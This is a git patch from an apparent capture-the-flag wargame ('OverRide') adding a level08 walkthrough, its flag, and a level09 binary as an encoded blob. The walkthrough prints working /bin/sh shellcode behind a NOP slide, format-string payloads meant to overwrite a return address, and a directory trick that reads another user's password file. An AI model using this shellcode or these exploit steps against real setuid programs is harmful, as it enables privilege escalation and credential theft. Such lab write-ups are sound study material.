From 17686e16d30f5a208a9d0c85bde79c008f9f6404 Mon Sep 17 00:00:00 2001
From: gbrochar
Date: Tue, 1 Jul 2025 15:26:11 +0200
Subject: [PATCH] feat: level08 + level09 elf

---
 level08/flag | 1 +
 level08/walkthrough | 44 +++++++++++++++++++++++++++++++++++++
 level09/Ressources/level09 | Bin 0 -> 12959 bytes
 3 files changed, 45 insertions(+)
 create mode 100644 level08/flag
 create mode 100644 level08/walkthrough
 create mode 100755 level09/Ressources/level09

diff --git a/level08/flag b/level08/flag
new file mode 100644
index 0000000..7301e9e
--- /dev/null
+++ b/level08/flag
@@ -0,0 +1 @@
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
diff --git a/level08/walkthrough b/level08/walkthrough
new file mode 100644
index 0000000..06b88df
--- /dev/null
+++ b/level08/walkthrough
@@ -0,0 +1,44 @@
+load shellcode in env with nop slide
+
+level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
+level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
+level08@OverRide:~$
+
+
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffe892
+
+need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
+
+Better version (file doesn't need to exist as log_wrapper is called before fopen)
+
+level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
+ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
+level08@OverRide:~$ cat backups/.log
+LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
+level08@OverRide:~$
+
+with env -i :
+Breakpoint 1, 0x0000000000400a5a in main ()
+(gdb) p (char *)getenv("SHELLCODE")
+$1 = 0xffffffffffffef79
+
+
+
+env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
+
+
+actually its way simpler T_T :
+
+level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
+level08@OverRide:~$ cd /tmp
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
+ERROR: Failed to open /home/users/level09/pass
+level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
+level08@OverRide:/tmp$ cat backups/
+home/ .log
+level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
+fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
+level08@OverRide:/tmp$ exit
+logout
+Connection to localhost closed.
diff --git a/level09/Ressources/level09 b/level09/Ressources/level09 new file mode 100755 index 0000000000000000000000000000000000000000..57c0d8fd40ca4b277da3b0383c6cfa6b6271a683 GIT binary patch literal 12959 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 literal 0 HcmV?d00001